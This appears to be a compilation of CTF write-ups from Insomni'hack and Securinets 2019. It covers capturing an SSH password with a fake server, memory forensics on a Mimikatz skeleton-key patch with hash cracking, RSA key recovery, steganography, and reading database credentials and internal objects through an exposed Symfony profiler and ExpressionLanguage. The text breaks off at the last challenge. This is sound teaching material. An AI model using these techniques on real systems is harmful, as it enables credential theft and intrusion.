# Knockknock
It was not about attacking, but listening on the laptop.There was a connection to port 22 from the server 10.13.37.99Let's install a FakeSSH serveur :git clone https://github.com/tylermenezes/FakeSSH
sudo pip install paramiko
cd FakeSSHcp ./data/config.sample.json ./data/config.jsonssh-keygen -f ./data/rsa -m 'PEM' set no password
sudo python3 server.py
wait max 10min
ssh -l svc-tenable-linux 10.13.37.99password = $\mx3i#u0@%6d@8fk^&^x*ntw2m
# Net1
it is supposed to happen between port TCP3000-4000a quick : nmap -Pn -p 3000-4000 10.13.37.99
Hint 2 : RFC741x => RFC7413 = Use TCP SYN Data
ok, Let's try some Python Scapy with TCP-Syn Data
Trying to send some commands but nothing back from the server.
Hint : We got the password "SyN" at 1am
Ok, let's send some commandsmain(SyN ls -la)....final command : main(SyN cat ./secret/me/not/flag.txt)
to find flag 
# mybrokenbash
nc server 1337 Let's send the command **cat flag** but we get cat flag in return ok so maybe stdout is closed but **cat flag 2>&1** doesn't work either so maybe stderr is also closed let's redirect stdout to stdin **cat flag 1>&0** We are on the good track but we are missing something still. The file had a carriage return (\r), and only the end of the file was sent back One had to find/know that cat has options. ** cat -A** = show-allFinal command to show the flag was ** cat -A flag 1>&0**
# Skeleton in the closet
https://download.scrt.ch/insomnihack2019/SiC_8b47589556efae17471bbb768e25b525.zip
After searching a bit, we found the reference of the Skeleton Misc function of the well known Mimikatz of Benjamin Delpy.https://github.com/gentilkiwi/mimikatz We find from the documentation, this function will somehow patch the LSASS process and adds a super password which will work for any username used ! By default, the password is : **mimikatz** The NTLM hash of mimikatz is : 
We can see from the source code of mimikatz this NTML password in little endian format.
The definition of the chall, is that a personalized version of mimikatz has been used. So we need to find the password which has been encoded in his customized version.
We download the memory dump file and analyse it with Volatility.
**python vol.py -f memory.vmem imageinfo.** To find the OS. 
**python vol.py -f memory.vmem --profile=Win2016x64_14393 pslist.** To find the process running. 
**python vol.py -f memory.vmem --profile=Win2016x64_14393 -p 588 memdump -D ./dump.**
Now we need to find how this alteration of this skeleton function has left traces in the memory. To find this, we use a standard Domain Controller and apply the function with the original version of Mimikatz. **mimikatz** **privilege::debug** **misc::skeleton**
After dumping the memory of the lsass process, let's analyse how the original mimikatz has writen the NTLM hash in the memory. We can use many tools, but here we use **hexedit lsass_post.DMP** And search for out hash starting with **60ba4f** (Ctrl-S)We can see the NTLM hash with a structure around it **C7 44 24 xx** between each part. (In blue the hash, orange the repeated pattern). 
Great, let's do the same on the dumped memory from Volatility and search for this pattern **C7 44 24**
The NTLM hash to crack is 65FB3480 14C7B62A 100AF97E EC0B6221 And we know from the chall definition that it is **INS{xxxxxxx}** (7 chars to find)
Let's bruteforce the hash: John:**john --format=nt -mask=INS{?1?1?1?1?1?1?1} -1=?l?u?d ./myhash.txt** Hashcat: **hashcat64 --session skeleton hash.txt -m 1000 -a 3 INS{?1?1?1?1?1?1?1} -1 ?l?u?d**
|
# MAZE
Here's the challenge:
Here's the given zip[chall.zip](https://github.com/ozancetin/CTF-Writeups/blob/master/2019/Securinets-CTF-Quals-2019/MAZE/chall.zip?raw=true)
Inside the zip, there are 101 public keys and 1 ciphertext as a decimal format and we need to find correct public key and try to crack if it is possible then create private key for decrypt the ciphertext.
First of all I thought a write script but there are already tool [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
This parameter useful for multiple public keys
```python2 RsaCtfTool.py --publickey "*.pem" --private```
after a bit waiting I saw only 2 public keys easily breakable as a :[private1.key](https://raw.githubusercontent.com/ozancetin/CTF-Writeups/master/2019/Securinets-CTF-Quals-2019/MAZE/private1.key)[private2.key](https://raw.githubusercontent.com/ozancetin/CTF-Writeups/master/2019/Securinets-CTF-Quals-2019/MAZE/private2.key)
So thats easy, we dont need to write a any script for 2 private keys.
remember RSA decrypting rule ```To decrypt a ciphertext c, compute c^d mod (N)``````N : Modulusd : Private exponentc : Ciphertext (we already have it)```So we need to find N and d from private key lets do it with openssl thats parameters show us everything about private key
```openssl rsa -text -in private1.key```
output :
```RSA Private-Key: (2048 bit, 2 primes)modulus: 00:b8:42:a7:7d:fb:1d:21:a8:0e:4a:38:79:3e:72: d6:05:5f:1a:79:38:1a:bb:6e:88:8e:47:e3:72:1d: 4f:57:92:7a:a0:f2:df:08:22:e4:8c:a1:ef:2a:63: ef:a3:e0:36:6b:7b:46:54:8f:2c:7b:ab:ff:c8:34: f3:4b:36:97:98:bf:5c:84:51:58:8e:77:77:8a:32: 54:68:54:3a:12:42:0b:b1:80:66:16:ce:cf:f3:c4: e2:5d:f8:cc:e5:dd:bd:5b:1a:84:d7:53:a8:9f:7c: b4:ea:34:79:d8:0c:e9:81:79:e5:9e:9a:cf:85:77: 30:13:2d:57:d1:d1:f7:71:75:71:e8:3d:df:f6:a8: e8:ed:b0:fc:6c:33:2e:5d:d8:0a:5f:01:9a:a4:71: 3d:49:dd:a7:96:74:5d:d6:7d:f9:b1:8c:c3:11:d7: e8:11:d4:0d:16:0f:da:5c:3f:bb:5e:f3:6a:c2:41: 60:49:7d:41:ab:48:69:06:02:dd:eb:56:18:db:04: 40:21:75:52:9f:9f:59:eb:58:6f:40:d8:36:02:56: 44:49:3d:f5:63:6f:23:2c:ac:3f:04:24:76:a9:0f: ea:06:3a:dc:31:66:15:c0:b4:79:2c:b1:f9:b6:9f: f7:22:80:16:1e:01:c7:68:81:f4:d2:65:97:c3:22: 53:f5publicExponent: 65537 (0x10001) privateExponent: 00:84:1f:7f:5c:6d:80:a1:0e:91:58:95:10:13:40: 62:c8:ad:3e:1d:67:a6:7b:79:b1:bf:5c:3a:f2:2b: a4:25:e6:29:ba:59:0c:a6:17:e7:0c:14:5d:9b:66: d7:82:09:96:dc:11:24:08:24:35:c0:64:3f:df:be: 60:2a:31:76:18:98:36:ed:c6:2a:9a:d5:7d:49:01: f7:d6:6b:76:cc:7a:c1:49:c1:08:f3:17:ce:b3:3c: 1d:19:46:fb:1d:64:97:8f:c8:ff:32:2b:91:c0:f2: ba:03:2a:27:a8:4c:f1:ee:de:8a:50:e5:2f:22:c3: a9:1c:47:2a:2e:90:c1:3e:7f:c0:62:3f:e9:45:8b: ba:11:c6:ef:34:d1:7e:e0:95:ea:5e:cf:5d:4e:40: 43:bd:9b:a6:82:12:9f:ef:79:ce:d2:79:9d:cc:89: fa:23:a8:9f:90:f4:ce:7c:eb:a0:73:d9:6c:38:eb: 80:1b:75:b9:4f:4f:91:ee:47:02:6b:ca:80:2e:1e: 70:ad:4f:f2:2b:96:56:22:da:8a:1a:aa:85:66:6e: 61:67:ef:35:ec:5f:d0:d9:f9:25:63:2c:68:18:00: 1e:b8:d2:c9:eb:50:12:c5:90:ce:2e:fd:f6:77:e5: ab:22:3f:31:7d:6e:ac:9a:3e:8d:23:f9:33:09:e8: 8f:4dprime1: 00:f0:49:e8:30:d7:29:72:dc:e5:94:e3:86:f7:dc: d8:4d:05:7a:97:91:d4:f5:7a:96:3d:8e:61:9a:94: d8:34:e2:60:cb:77:e3:d0:d5:38:6b:23:37:91:14: 4f:50:ff:28:df:38:44:4f:a8:b7:1e:52:d8:31:3c: 79:da:d9:09:d5:b8:7f:7a:f8:72:f8:f2:22:50:10: c7:3a:ca:e0:e1:db:96:b8:8e:0d:e1:5c:ef:6b:58: c6:51:b1:a2:61:7e:14:19:c4:51:0e:3c:50:26:21: f8:47:70:e0:f7:95:8b:f0:f8:97:c6:83:af:0b:a9: 0a:30:82:44:fd:42:22:d1:33prime2: 00:c4:4e:e9:88:fb:54:c6:96:ee:67:cd:5a:3b:bb: b1:59:40:4e:6d:4c:45:3a:43:1c:0c:ed:82:8d:a3: f2:1e:fa:0a:c8:c4:70:d0:d6:d2:09:69:7f:58:92: ef:95:e0:54:16:10:8e:a1:72:a0:cb:bf:5f:2d:2b: b0:d4:8e:2a:93:06:b8:b4:13:eb:05:5e:0f:33:1b: 89:8b:b9:a0:aa:e9:10:e6:c6:8a:f0:9a:0d:f7:10: 99:da:c1:4c:29:22:fc:41:9b:3d:97:1e:fe:88:57: 31:9f:e1:53:f4:a8:73:69:67:48:b5:40:83:48:4a: a0:5f:0e:23:73:db:9f:16:37exponent1: 00:ef:26:ef:d4:a4:61:19:74:27:7f:9f:50:b6:a2: f4:18:fc:69:fe:2e:e3:c0:8a:88:bb:ad:59:11:6c: 31:1f:b9:6b:d3:36:78:e4:61:42:ac:c7:39:47:c8: ea:04:58:60:8a:82:4a:e2:e9:ad:8f:9d:ae:94:9a: 77:41:4c:a0:90:38:f7:90:21:74:f4:b6:b1:55:f4: cd:05:83:e4:7c:86:7c:25:25:25:45:76:a4:c7:b7: 6c:72:e4:94:13:ea:53:01:2e:35:ea:30:37:29:2c: c8:19:fa:8b:bd:7e:f6:f0:17:cb:9f:85:72:93:ed: 63:39:d2:7d:ed:7e:84:7e:a7exponent2: 01:16:5a:ce:ca:6d:96:c8:01:3c:0b:f4:22:fe:90: 25:e9:68:45:cc:b5:59:74:43:b4:82:a0:45:7e:91: f9:bf:f2:cd:57:e1:34:16:ec:84:e6:d3:b0:be:e7: 9a:d1:ea:45:51:04:29:3a:c4:4f:3c:99:1f:5b:ed: 97:cf:cd:c6:90:b3:f7:33:61:0a:df:91:7f:fb:f8: 10:11:10:25:c2:32:b8:c4:82:c2:80:67:f1:65:63: 24:c6:0b:50:f3:03:a8:ad:5e:72:f6:d5:fc:15:57: 8e:06:26:7b:e5:6e:f6:37:7f:3c:99:c5:e0:61:a1: 6f:c5:59:46:ec:01:7e:93coefficient: 00:8c:2d:91:12:87:23:5f:b5:9b:ce:ce:94:a1:8c: 0c:5b:0b:2d:f5:a9:81:6d:f1:ea:f1:bd:d2:2f:80: d6:bd:03:a7:b2:7e:e4:7e:0e:dd:f6:3a:ec:9f:ae: c2:e7:ec:87:c1:1e:65:76:df:b5:31:3d:64:da:8a: 98:64:1d:d1:33:75:34:4e:5e:1a:12:26:fa:c6:ce: 49:b7:6c:49:37:c4:50:01:06:3c:f5:f5:81:37:a1: 28:ef:26:d3:63:2c:37:24:8f:88:66:54:ce:e0:f7: c8:b7:25:61:53:d6:67:16:0e:78:b0:43:8e:9f:fe: 23:5b:e9:94:c2:bb:77:b0:93writing RSA key```
And as you can see here's modulus and private exponent Now we have N and d. Just convert hex to decimal and write a python script.
```python n = int("00b842a77dfb1d21a80e4a38793e72d6055f1a79381abb6e888e47e3721d4f57927aa0f2df0822e48ca1ef2a63efa3e0366b7b46548f2c7babffc834f34b369798bf5c8451588e77778a325468543a12420bb1806616cecff3c4e25df8cce5ddbd5b1a84d753a89f7cb4ea3479d80ce98179e59e9acf857730132d57d1d1f7717571e83ddff6a8e8edb0fc6c332e5dd80a5f019aa4713d49dda796745dd67df9b18cc311d7e811d40d160fda5c3fbb5ef36ac24160497d41ab48690602ddeb5618db04402175529f9f59eb586f40d836025644493df5636f232cac3f042476a90fea063adc316615c0b4792cb1f9b69ff72280161e01c76881f4d26597c32253f5",16)
d = int("00841f7f5c6d80a10e91589510134062c8ad3e1d67a67b79b1bf5c3af22ba425e629ba590ca617e70c145d9b66d7820996dc1124082435c0643fdfbe602a3176189836edc62a9ad57d4901f7d66b76cc7ac149c108f317ceb33c1d1946fb1d64978fc8ff322b91c0f2ba032a27a84cf1eede8a50e52f22c3a91c472a2e90c13e7fc0623fe9458bba11c6ef34d17ee095ea5ecf5d4e4043bd9ba682129fef79ced2799dcc89fa23a89f90f4ce7ceba073d96c38eb801b75b94f4f91ee47026bca802e1e70ad4ff22b965622da8a1aaa85666e6167ef35ec5fd0d9f925632c6818001eb8d2c9eb5012c590ce2efdf677e5ab223f317d6eac9a3e8d23f93309e88f4d",16)
c = 12225682126551187619399843891561465899608952498495120851070778192443023261485900560363269700242510941697365921981918056191408738905974825435324679841994232057252389709580959723999122054844144379187848417389566267322902673441312265008128249280701778727420570269893119286011513549800540500264752909082405313097299590601819529975638766522951170517766409850156769569563924473524368177233982270360715976884639307240445794551655637991803019693125040126171348043927410721121473304998359286936518573367417946711868112216965614586268606230443139176878435753744068734717043992817907788262531021387616180516736397859628481024223
plain = str(hex(pow(c, d, n)))[2::]print(''.join([chr(int(''.join(c), 16)) for c in zip(plain[0::2],plain[1::2])]))``` Flag : ```securinets{rs4_1s_g00d_s0m3t1m3s!}``` |
# EZ
__PROBLEM__
Welcome to Securinets, this one is an easy one.
Please make sure you hash the WORD with sha1 (lowercase hash letter)
The final flag is : Securinets{the_hash_of_the_word}
[Pic Link](pic.zip)
Author:BlueWhale
__SOLUTION__
Again I started with strings followed by exiftool and then binwalk and none of those gave anything interesting. And then I noticed that the image is of `.png` format that means we can use `zsteg` on that image.
```bash➜ zsteg pic.pngb1,rgb,lsb,xy .. text: "--START--\n\"The fact is that upon his entrance I had instantly recognized the extreme\npersonal danger in which I lay. The only conceivable escape for him lay in silencing\nmy tongue. In an instant I had slipped the revolver from the drawer into my\npocket and"b2,b,msb,xy .. text: "_uW}W}W}"b3,b,lsb,xy .. file: very old 16-bit-int big-endian archiveb4,r,lsb,xy .. text: "\nvvwgffwfwvwgg"b4,g,lsb,xy .. text: "gwvwvffwvgvfggfvwgvfvgfgvgffvwfvwgfvfgvvwwvfwgfwfgvgvgffwgffffffwgfffgfgvwvfwgvfwwfwvwfgvwvfwgvffgvfvwffwgvwvwvfggffvgfgwgfffgvfwgvfvgffwgfwwgfgwgfffgvfwwvfvgfffgvgwgffvwvgvwvfvgfgwgvfvwfgvwfffgvgvgffwwvfwgfvfgfgfgffwgvgvwfgvvffwwfvwwvgvwvgfffgfgfgfgfgvwvf"b4,b,lsb,xy .. text: "wfgggfgfgffwffwfvfffwfggwfgwvfgfvfgfvggfwfvfvfggvfgvwgwgwfwgvfffvfgfvfgvvgggwggvvfgfwfwwwfwwvfgfvggvwfggvggfwfggfgggvgwwwfgvvfggwfwgvfgwwfggvfggvfgwvfggvfvfgfggvfwvwgffvfwvvfgwwfgfwfffwgwgvgggvfwwvfgvvfffwfgwvfgvvgwwwfgvvfgvwfwwvfgfwfwgwffvvfgvvfgvvfgvvggg"b4,rgb,lsb,xy .. text: "ogWef&vfFmw"b4,rgb,msb,xy .. text: "`vnovng>"b4,bgr,lsb,xy .. text: "ogVev&ffG}g"```
This show that there's some strings hidden there, let's extract that
```➜ zsteg -E "b1,rgb,lsb,xy" pic.png--START--"The fact is that upon his entrance I had instantly recognized the extremepersonal danger in which I lay. The only conceivable escape for him lay in silencingmy tongue. In an instant I had slipped the revolver from the drawer into mypocket and was covering him through the cloth. At his remark I drew the weaponout and laid it cocked upon the table. He still smiled and blinked, but there wassomething about his eyes which made me feel very glad that I had it there,"You evidently don't know me,' said he."'On the contrary,' I answered, 'I think it is fairly evident that I do. Pray takea chair. I can spare you five minutes if you have anything to say.'"'All that I have to say has already crossed your mind,' said he."'Then possibly my answer has crossed yours,' I replied."'You stand fast?'"'Absolutely.'"He clapped his hand into his pocket, and I raised the pistol from the table.But he merely drew out a <DETELED_WORD> in which he had scribbled somedates."You crossed my path on the fourth of January,' said he. 'On the twenty-thirdyou incommoded me; by the middle of February I was seriously inconveniencedby you; at the end of March I was absolutely hampered in my plans; and now, atthe close of April, I find myself placed in such a position through your continualpersecution that I am in positive danger of losing my liberty. The situation isbecoming an impossible one.'"'Have you any suggestion to make?' I asked."'You must drop it, Mr. Holmes,' said he, swaying his face about. 'You reallymust, you know.'"--END--```
This is what we get from the extracted data and now all we have to do is to find the `<DELETED_WORD>`. Simply google any part of the paragraph and it will give us the [original](https://www.pagebypagebooks.com/Arthur_Conan_Doyle/Memoirs_of_Sherlock_Holmes/Adventure_XI_The_Final_Problem_p4.html)
After comparing with original we found out that the missing word is `memorandum-book`, but submitting the sha1 of this string didn't worked so we tried with `memorandumbook`
```bash➜ echo "memorandumbook" | sha1sum3e06c0914406bcd91c6326d32a75be36dd44a2d4```FLAG - Securinets{3e06c0914406bcd91c6326d32a75be36dd44a2d4} |
# Game server (misc [RE really])## 357 pts
This challenge is almost exactly the same as the "Hard Tibia" from ECSC, so make sure to [read my writeup of it](https://github.com/AltairQ/writeups/tree/master/hack.cert/re/hard%20tibia). It's so similar that my old modified otclient still worked!
Only difference is that the server-side "authentication" has changed. It still depends on only two inputs - the character's nickname and its position. Let's see how it's done, courtesy of IDA decompiler:
```c++
__int64 __fastcall chksum(char *nick?, unsigned int *a2){ __int64 result; // rax unsigned int v3; // [rsp+14h] [rbp-2Ch] unsigned int v4; // [rsp+18h] [rbp-28h] int v5; // [rsp+1Ch] [rbp-24h] unsigned int i; // [rsp+20h] [rbp-20h] int j; // [rsp+20h] [rbp-20h] int k; // [rsp+20h] [rbp-20h]
v3 = *(_DWORD *)nick?; v4 = *((_DWORD *)nick? + 1); v5 = 0; for ( i = 0; i <= 47; ++i ) { v5 -= 559038737; v3 += (v4 + v5) ^ (16 * v4 + a2[1]) ^ ((v4 >> 5) + a2[2]); v4 += (v3 + v5) ^ (16 * v3 + a2[3]) ^ ((v3 >> 5) + *a2); } for ( j = v4 & 0x7F; j; --j ) v3 += v4 + j; for ( k = v3 & 0x7F; k; --k ) v4 += v3 - k; *(_DWORD *)nick? = v3; result = v4; *((_DWORD *)nick? + 1) = v4; return result;}
unsigned __int64 __fastcall Game::playerSayExtended(Game *this, unsigned int playerID){ Position *playerPos?; // ST28_8 bool someCheck; // al Container *PlayerBackpack; // rax __int64 v5; // ST50_8 char *v6; // rsi Item **v7; // rax bool v8; // al const #83 *v9; // rax signed int i; // [rsp+1Ch] [rbp-A4h] Player *player; // [rsp+20h] [rbp-A0h] __int64 playerNick?; // [rsp+30h] [rbp-90h] unsigned __int64 posHash; // [rsp+38h] [rbp-88h] __int64 playerInventory?; // [rsp+48h] [rbp-78h] Item *v16; // [rsp+58h] [rbp-68h] char v17; // [rsp+60h] [rbp-60h] char v18; // [rsp+80h] [rbp-40h] unsigned int someConsts[4]; // [rsp+A0h] [rbp-20h] char sthPlayerNick[8]; // [rsp+B0h] [rbp-10h] unsigned __int64 stackCanary; // [rsp+B8h] [rbp-8h]
stackCanary = __readfsqword(0x28u); player = (Player *)Game::getPlayerByID(this, playerID); if ( player ) { Player::resetIdleTime(player); playerPos? = (Position *)(*(__int64 (__fastcall **)(Player *))(*(_QWORD *)player + 64LL))(player); playerNick? = (*(__int64 (__fastcall **)(Player *))(*(_QWORD *)player + 192LL))(player); someConsts[0] = 0xCAFEBABE; someConsts[1] = 0xDEDEDEDE; someConsts[2] = 0xCAFEBABE; someConsts[3] = 0xCAFEBABE; posHash = 1693LL * (playerPos?->y + playerPos?->x + playerPos?->z) - 811 * ((unsigned __int64)(0xA19E253F72959F69LL * (unsigned __int128)(unsigned __int64)(1693LL * (playerPos?->y + playerPos?->x + playerPos?->z)) >> 64) >> 9); for ( i = 0; i <= 7; ++i ) sthPlayerNick[i] = *(_BYTE *)playerNick?[i];
chksum(sthPlayerNick, someConsts); if ( posHash == *(_QWORD *)sthPlayerNick - 811 * ((unsigned __int64)(0xA19E253F72959F69LL * (unsigned __int128)*(unsigned __int64 *)sthPlayerNick >> 64) >> 9) ) { ... // success! free gold! } { ... // fail, and you lose 10hp } }}
```
Obviously I took the liberty of somewhat cleaning up the code. I deduced that it uses the player's position from the fact that it seemed to use something like `struct ... { int16_t a; int16_t b; int8_t c}`, which is exactly how the server stores a `Position` struct (as seen somewhere in the [code](https://github.com/otland/forgottenserver) ).
If you were to modify your client you'll quickly learn that the spawn point is `(95, 117, 7)`. Calculating the appropriate `posHash` value (see `brute.cpp:calc`), we can bruteforce our 8-character nickname (again, see `brute.cpp`). This time the algorithm returns a lot more possibilities. After grabbing one and creating a new account, you can test whether you pass the check - you should lose 10hp (if you're not standing exactly at the spawn point). Now all that's left is to kill a goblin (northern part of the map), then return to the spawn (just get killed) and trigger the backdoor. You should get kicked off the server, and upon logging in, you should get free GP. Every stack of GP is set to 100, so split the stack as many times as necessary. After becoming rich talk to the Flagkeeper, just like in `Hard Tibia`.
Zajebiste zadanie ;) |
# CTFSecurinets Quals 2019 WriteupThis repository serves as a writeup for CTFSecurinets Quals 2019
## Custom Location
**Category:** Web**Points:** 964**Author:** TheEmperors**Description:**
>Try to find out the database credentials.
>The author changed the location of some files to protect the web application from script kiddies.
>Link: https://web0.ctfsecurinets.com/
**Hint:**
> No hint.
### Write-upWhen you visit the task page, you will get this page
Nothing intresting.
Let's try visiting https://web0.ctfsecurinets.com/test
Now we can see an error page. It looks like we have much details as an error page. And it seems that it's based on php Symfony framework.
We try to click on one of the listed files under the error "NotFoundHttpException" text.
For example we try getting access to the link below
We find out that this page show the source code of one of the Symfony project files from this link:
>https://web0.ctfsecurinets.com/_profiler/open?file=vendor/symfony/http-kernel/EventListener/RouterListener.php&line=139#line139
After some tests I changed the URL to:
>https://web0.ctfsecurinets.com/_profiler/
And I was surprised that Symfony web profiler module was enabled. For persons that don't know what profiler is, it's a module that help developpers to debug code while development process. It's enabled on "dev" environnment.
Let's resume what we got, we have profiler enabled and we have to search about database credentials on web profiler configuration.
We get access to one of the logged requests
We go to configuration
And there we can find Symfony configuration
We get access to the "View full PHP configuration" link. But we got a blocking message
It looks like we should find database credentials without phpinfo.
Until now, this is the common solution. The purpose of the task was more difficult. There was only one solution until that the author found a non intending solution.
So I'm gonna start by explaining the non intending solution (easy one) before explaining the intendended solution.
#### Non intended solution (easy one)
This was very easy to find from Request/Response menu. Then, Server Parameters. And then DATABASE_URL variable
>"mysql://symfony_admin:Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}@127.0.0.1:3306/symfony_task"
So the flag is ``Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}``
#### Intended solution (real purpose the task and the hard one)
Because of the previous non intended solution, this intended solution will be very useless. But some teams managed to find this one and that was very smart.
So, I'm gonna explain it.
If we ignore the previous non intended solution, we will try to open the configuration file that contains the database password defined on Symfony project.
So if we return to the configuraion page from the profiler, we can find Symfony framework version
>Symfony 4.2.4
Now, after a quick search from Google, we find the configuration file that contains the database credentials for Symfony 4.2
>https://symfony.com/doc/4.2/best_practices/configuration.html
Then, we try to open `.env` file from the profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=.env
But it looks like that file was not found. And that's when we remember that task name is `Custom Location`. So that we need to find database credentials from a file that was moved to another location.
So how should we find it if we can only read files ?
Since framework configuration files are always available anywhere on the project, our solution was to download a Symfony project (4.2.4) and find out where .env file is loaded. Then we open that file on the Web Profiler on this task. And so we can read the new path of the .env file.
As a requirement, we need to install php 7.1 at least. Otherwise Symfony 3.4 will be installed. But nevermind since starting from Symfony 3.4, the project files tree is the same.
Now, we start searching for the .env file from all Symfony files except Test files, vendor directory (third party directory of any external module), and cache files `grep '\.env' * -R | grep -v Test | grep -v vendor | grep -v cache`
So, after opening all these files, we find that the only possible file that could load `.env` file is `config/bootstrap.php`
And that's how we are going to find out the real `.env` file from the Web Profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=config/bootstrap.php
So, the real `.env` file path is `secret_ctf_location/env`. We try to open it from the Web profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=secret_ctf_location/env
So the flag is `Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}`.___
## Trading values
**Category:** Web**Points:** 989**Author:** TheEmperors**Description:**
>N00B developers are an easy target. Try to exploit the application feature to get the hidden flag.
>Link: https://web1.ctfsecurinets.com/
**Hint (pinned on Web channel from Discord):**
>Hint 1: Trading values: It's a server side task
>Hint 2: Trading values: change request values as a hacker
>Hint 3: Trading values: For the last part of the task: try to find another one. You don't know it but it's known by everyone
### Write-up
After we opened the task link, we get this page with a dynamic line chart drawen on real time.
Reading the source code will not give us anything intresting: [index.html](resources/web-989-trading_values/inedx.html). Maybe because of the `Hint 1`.
So by inspecting Network Tab from the Browser (chrome) development tools (Ctrl+Maj+I, then go to Network Tab)
We can see there that each second a HTTP request is sent somewhere.
We inspect one of these requests. For example this one:
```https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values%5Bv1%5D=STC&values%5Bv2%5D=PLA&values%5Bv3%5D=SDF&values%5Bv4%5D=OCK```
We find the sent parameters request are
```formula: KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=values[v1]: STCvalues[v2]: PLAvalues[v3]: SDFvalues[v4]: OCK```
And the returned response is a random float number
The sent `formula` parameter was encoded using base64 base.
We decoded it and we got this result:
```(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg```
So the decoded request was
```formula: (v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avgvalues[v1]: STCvalues[v2]: PLAvalues[v3]: SDFvalues[v4]: OCK```
It seems like formula is using v1 attributes (mpk, drf, avg), v2 attributes (avg, mds, dmq), v3 attributes (pdi, rar, gdp, avg) and v4 attributes (mum, dad, avg).
We analyzed different HTTP request parameters and we figured out that formula changes (from Javascript when generating the request) but the concept is the same, the variables v1, v2, v3 and v4 are the same with the same attributes.
The hint 2 `change request values as a hacker` say that we need to change the formula or the values. But everytime we change the values[] value (not the key) we get a HTTP 500 error.
When we remove a values[] parameter (like `values[v4]=OCK`, we get an error that v4 was missing: `Variable "v4" is not valid around position 117 for expression `(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg`. Did you mean "v1"?`
We googled this error and we got an intresting result
It looks like this feature is based on ExpressionLanguage module from Symfony. So the backend project is a php one. And it's trying to compute that formula using those 4 values.
But how if we follow Hint 2 and remove some `values[]` parameters and we also remove those variables from the `formula` parameter and we only keep one variable ?
For example:
```formula: (v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)values[v1]: STC```
So the real parameters request will be (base64(`formula` parameter)):
```formula: KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpvalues[v1]: STC```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEp%3D&values%5Bv1%5D=STC
We also get a float result. This mean that the backend page is answering to this request correctly.
But how if if keep only v1 insteal of v.<attributes> ?
For example:
```formula: v1values[v1]: STC```
So the real parameters request will be (base64(`formula` parameter)):
```formula: djE=values[v1]: STC```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=djE=&values%5Bv1%5D=STC
We get another intresting result
We get the same thing when we replace `STC` by `OCK` or `SDF` or `PLA`:
Results (resume):
```For STC: object(App\Entity\STC)#233 (4) { ["id":"App\Entity\STC":private]=> NULL ["avg"]=> int(909) ["mpk"]=> int(100) ["drf"]=> int(48) }For OCK: object(App\Entity\OCK)#253 (4) { ["id":"App\Entity\OCK":private]=> NULL ["avg"]=> int(43) ["mum"]=> int(96) ["dad"]=> int(39) }For SDF: object(App\Entity\SDF)#252 (5) { ["id":"App\Entity\SDF":private]=> NULL ["avg"]=> int(328) ["pdi"]=> int(87) ["gdp"]=> int(11) ["rar"]=> int(85) }For PLA: object(App\Entity\PLA)#232 (4) { ["id":"App\Entity\PLA":private]=> NULL ["avg"]=> int(556) ["mds"]=> int(17) ["dmq"]=> int(74) }```
So what we talked about before (the v1, v2, v3 and v4 attributes) was correct. And we got a namespace path `(App\Entity\CLASS_NAME` which is related to Symfony (PHP).
But how this works ? We tried to substitute values[v1] value with many values but we always fail.
We read Hint 3 `Trading values: For the last part of the task: try to find another one. You don't know it but it's known by everyone`. This is the difficult part.
Because we don't know about WHAT the author is talking when he say `it`. Maybe is he talking about `values[v1]` value. Because this is what we can actuelly change.
We can't guess it whitout knowing what is `OCK` ? From the previous output, it's an object.
Is the backend page creating a new OCK object using this syntax ? `variable=new <out_input>()` and he is calling computing the formula using that variable ? or is it using `$OCK` variable like this `$<our_input>` ?
We followed the hint 3 and tested `values[v1]=__CLASS__` (to check if the code is going to call `new __CLASS()` to check the first theory. But, we got a blank page (a get a blank page also when we use a random values[v1] value). So this is not working.
Let's try to check the second theory (using a variable name). But we don't know any variable from the backend project.
And since we know that the backend application is based on PHP (Symfony) which is a Framework using classes (this is trivial when we saw namespaces from the object dump `App\Entity\CLASS_NAMES`), we figured out what does mean `Hint 3`. We need to google it and find any well known variable namees that we migh forget it actually but eveyone know it on Internet. And that's how we find the trivial local variable name `$this`.
So we try
```formula: v1values[v1]: this```
So the real parameters request will be (base64(`formula` parameter)):
```formula: djE=values[v1]: this```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=djE=&values%5Bv1%5D=this
And that's how we dump `$this` local variable from which we find the flag
A quick search we find the flag
So, the flag is `Securinets{T00_Ea5y_T0_U5e_This_Local_variable}`.___
## Unbreakable Uploader
**Category:** Web**Points:** 1000**Author:** TheEmperors**Description:**
